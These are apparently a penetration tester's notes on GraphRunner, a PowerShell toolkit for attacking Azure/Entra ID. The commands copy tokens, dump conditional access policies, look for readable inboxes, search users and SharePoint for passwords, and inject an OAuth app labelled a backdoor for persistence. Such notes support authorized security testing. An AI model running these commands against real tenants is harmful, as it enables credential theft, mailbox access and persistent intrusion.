# GraphRunner
Awesome tool for enumerating/attacking Azure.  [This page](https://github.com/dafthack/GraphRunner/wiki/Potential-Attack-Path-Examples) has some practical attacks.  And [this blog](https://mturhanlar.medium.com/microsoft-entra-id-azure-ad-penetration-test-red-team-assessment-all-in-one-tool-a74fe7b3c4c1) had some nice tips as well.  I also enjoyed [this presentation](https://www.first.org/resources/papers/amsterdam24/Stoner-Herrald-Google-2024FIRST-TC-GraphRunner.pdf).  Also I just saw this [GraphRunner cheatsheet](https://www.blackhillsinfosec.com/graphrunner-cheatsheet/) updated in August of 2025!

## Authenticate
```
get-graphtokens
```

## Get your tenantid
```
get-tenantid -domain yourdomain.com
```

## Get your own info (like your `id`)
```
$headers = @{Authorization = "Bearer $($tokens.access_token)"}
Invoke-RestMethod -Uri "https://graph.microsoft.com/v1.0/me" -Headers $headers | 
    Select-Object displayName, id, userPrincipalName
```

## Grab access token to clipboard
```
$token | Select-Object -ExpandProperty access_token | Set-Clipboard
```

## Enumerate ALL the permissions
```
Invoke-BruteClientIDAccess -domain example.com -refreshToken $tokens.refresh_token
```

## Run the kitchen sink and GraphRun all the things!
```
invoke-graphrunner -tokens $tokens
```

## Run with specific tests disabled
```
Invoke-GraphRunner -Tokens $tokens -DisableRecon -DisableUsers -DisableGroups -DisableCAPS -DisableApps -DisableEmail -DisableTeams
```

## Dump conditional access policies
```
invoke-dumpcaps -tokens $tokens -resolveguids
```

## Get users with the word "password" in their descriptions
```
Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"
```

## Get ALL users
```
get-azureadusers -tokens $tokens -outfile users.txt
```

### See if you can read any inboxes of those users
```
Invoke-GraphOpenInboxFinder -tokens $tokens -userlist .\users.txt
```

## Get groups / updatable groups / dynamic groups
```
Get-SecurityGroups -Tokens $tokens -OutputFile groups.txt
```
```
Get-UpdatableGroups -Tokens $tokens
```
```
Get-DynamicGroups -Tokens $tokens
```

## Get SharePoint URLs
```
Get-SharePointSiteURLs -Tokens $tokens
```

## Find interesting SharePoint/OneDrive files
For example, those containing the word "password":

```
Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm "password" -OutFile sharepoint-password-search
```

## "Inject" a trustworthy app for persistence
```
Invoke-InjectOAuthApp -AppName "Test App September 2025" -ReplyUrl "http://testing123" -scope "op backdoor" -Tokens $tokens
```